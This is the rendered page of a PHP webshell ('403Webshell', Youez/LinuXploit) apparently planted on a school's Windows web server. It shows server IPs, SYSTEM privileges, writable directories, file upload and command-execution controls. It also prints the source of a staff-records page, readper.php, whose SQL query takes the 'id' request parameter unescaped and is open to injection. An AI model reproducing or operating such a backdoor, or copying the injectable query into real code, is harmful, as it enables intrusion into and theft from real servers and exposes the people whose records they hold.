403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/ratana/2568/modules_backup/personal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/ratana/2568/modules_backup/personal/readper.php
<script type="text/javascript">
function showemotion() {
	emotion1.style.display = 'none';
	emotion2.style.display = '';
}
function closeemotion() {
	emotion1.style.display = '';
	emotion2.style.display = 'none';
}

function emoticon(theSmilie) {

	document.form2.COMMENT.value += ' ' + theSmilie + ' ';
	document.form2.COMMENT.focus();
}
</script>

<body>
<table width="100%"  height=500 border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999" bordercolordark="#FFFFFF">
	<tr>
		<td colspan="8"vAlign=top>
	<TABLE cellSpacing=0 cellPadding=0 width=900 border=0 align="center"vAlign=top>
      <TBODY>
        <TR>
          <TD vAlign=top align=center>

				 
 
  <tr> 
    <td >
<BR>
 
</td>
</tr>
<tr>
<td width="900" >
 <font color=blue>การอบรม/งานวิจัย </font><BR>
<table width="100%" cellspacing="2" cellpadding="1" >
<tr bgcolor="#336633" height=25>
   <td  align=center width="3%"><font color="#FFFFFF"><B>ลำดับ</B></font></td>
   <td width="40%"  align=center ><font color="#FFFFFF"><B>หลักสูตร</B></font></td>
   <td  align=center width="20%"><font color="#FFFFFF"><B>หน่วยที่จัด</B></font></td>
	<td width="15%" align=center ><font color="#FFFFFF"><B>วันเดือนปี</B></font></td>
	<td width="12%" align=center ><font color="#FFFFFF"><B>งบประมาณ</B></font></td>
  </tr>  
<?
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='$_GET[id]' ");
		$arr[user] = $db->fetch($res[user]);
	$res[course] = $db->select_query("SELECT * FROM ".TB_COURSE." WHERE user_id='".$arr[user][id]."' ORDER BY id DESC");
	$count=0;
	$i=1;
	while($arr[course] = $db->fetch($res[course]))
{
if ($count==0) { echo "<TR>"; }
 ?>
<tr bgcolor="#E6FEDE"height=20>
<td align="center"><? echo"".$i?></td>
<td><?=$arr[course][course];?></td>
 <td ><?=$arr[course][department];?></td>
<td align="center"><?=$arr[course][date];?></td>
<td align="center"><?=$arr[course][budget];?></td>

</TR>

</td>
  </tr>
<?
	$i++;
?>
<? 
$count++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();	
 ?>
	</TABLE>		<!-- End Enable Comment -->
<tr>
<td width="900" >
 <font color=blue>การได้รับรางวัล ยกย่องเชิดชูเกียรติ </font><BR>
<table width="100%" cellspacing="2" cellpadding="1" >
<tr bgcolor="#3399cc" height=25>
   <td  align=center width="3%"><font color="#FFFFFF"><B>ลำดับ</B></font></td>
   <td width="40%"  align=center ><font color="#FFFFFF"><B>ชื่อรางวัล</B></font></td>
   <td  align=center width="20%"><font color="#FFFFFF"><B>ระดับ</B></font></td>
	<td width="15%" align=center ><font color="#FFFFFF"><B>วันเดือนปี</B></font></td>
	<td width="10%" align=center ><font color="#FFFFFF"><B>หลักฐาน</B></font></td>
  </tr>  
<?
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
	$res[awards] = $db->select_query("SELECT * FROM ".TB_AWARDS." WHERE user_id='".$arr[user][id]."' ORDER BY id DESC");
	$count=0;
	$i=1;
	while($arr[awards] = $db->fetch($res[awards]))
{
if ($count==0) { echo "<TR>"; }
 ?>
<tr bgcolor="#FFFFDF"height=20>
<td align="center"><? echo"".$i?></td>
<td><?=$arr[awards][awards];?></td>
 <td ><?=$arr[awards][degee];?></td>
<td align="center"><?=$arr[awards][date];?></td>
<td align="center">
<?
					 if($arr[awards][full_text]){ 	  
?>
<A href="data/fileawards/<?=$arr[awards][full_text];?>" target="_blank"><IMG SRC="images/pdf.gif"width="20"></A>
		  <? } else {
		 echo "";
	 }?>
	 </td>
</TR>

</td>
  </tr>
<?
	$i++;
?>
<? 
$count++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();	
 ?>
	</TABLE>		<!-- End Enable Comment -->
			<!-- End guide -->
	  </TD>
        </TR>
    </TABLE>
	<BR>
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit